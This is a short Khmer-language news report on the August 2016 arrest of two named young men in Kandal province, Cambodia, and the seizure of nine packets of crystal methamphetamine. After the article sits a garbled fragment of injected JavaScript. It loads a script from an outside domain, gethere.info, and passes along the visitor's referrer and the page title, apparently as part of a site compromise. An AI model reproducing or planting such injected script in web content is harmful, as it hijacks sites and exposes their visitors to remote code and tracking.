ឃាត់ខ្លួនមនុស្ស២នាក់ដកហូតថ្នាំញៀន៩កញ្ចប់តូចធំ

កណ្តាល៖ ជនសង្ស័យចំនួន២នាក់ត្រូវបានសមត្ថកិច្ចឃាតខ្លួនបាន ពាក់ព័ន្ធករណីគ្រឿងញៀន កាលពីវេលាម៉ោង៩និង២០នាទី ថ្ងៃទី ១៣ ខែសីហាឆ្នាំ២០១៦ នៅចំណុចភូមិ ព្រែកតាមេម ឃុំ ព្រែកស្ដី ស្រុកកោះធំ ខេត្តកណ្ដាល ។

សមត្ថកិច្ចបានអោយដឹដថាជនសង្ស័យ៖០២ នាក់ដែលត្រូវបានឃាត់ខ្លួននោះទី១-ឈ្មោះ ស្រ៊ា ដន ភេទ ប្រុស អាយុ ២៣ឆ្នាំ ទី២-ឈ្មោះ ឃាន រ៉ែន (ហៅ លីន) ភេទប្រុស អាយុ ២៣ ឆ្នាំ ជនជាតិខ្មែរ ទាំង២នាក់មានទីលំនៅភូមិ ព្រែកតាមេម ឃុំព្រែកស្ដី ស្រុកកោះធំ ខេត្តកណ្ដាល ។

ក្រោយឃាត់ខ្លួនសមត្ថកិច្ចបានដកហូតម៉្សៅក្រាមពណ៌សថ្លាប្រភេទថ្នាំញៀន(ម៉ាទឹកកកIce) ០៩ កញ្ចប់(០៨កញ្ចប់តូច ,០១ កញ្ចប់ធំ) ។
ប្រភពដដែលបន្តថាកាលពីពេលវេលាកើតហេតុខាងលើ កម្លាំងសមត្ថកិច្ចជំនាញនគរបាលស្រុកកោះធំ បានធ្វើការ ល្បាតក្នុងភូមិសាស្ត្រ បានទទួលព័ត៌មាន ថាមានការលក់គ្រឿងញៀនយ៉ាងសកម្មនៅចំណុចកើតហេតុខាងលើ ។ ភ្លាមនោះកម្លាំងជំនាញបានសហការជាមួយកម្លាំងប៉ុស្ដិ៍រដ្ឋបាលព្រែកស្ដី ចុះស្រាវជ្រាវទៅដល់កន្លែងកើតហេតុខាងលើ ហើយបានឃាត់ខ្លួនជនសង្ស័យ ០១ នាក់ ឈ្មោះ ស្រ៊ា ដន ភេទប្រុស អាយុ ២៣ ឆ្នាំ និងត្រួតពិនិត្យរកឃើញថ្នាំញៀន(ម៉ាទឹកកក)០៩ កញ្ចប់(០៨ កញ្ចប់តូច,០១ កញ្ចប់ធំ)ដែលជនសង្ស័យបានទុកជាប់នឹងខ្លួន ។

បច្ចុប្បន្នជនសង្ស័យទាំង០២ នាក់ ខាងលើ និងវត្ថុតាង ត្រូវបានបញ្ជូនមកកាន់អធិការដ្ឋាននគរបាលស្រុកកោះធំដើម្បីបន្តចាត់ការតាមនីតិវិធី ។

12s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More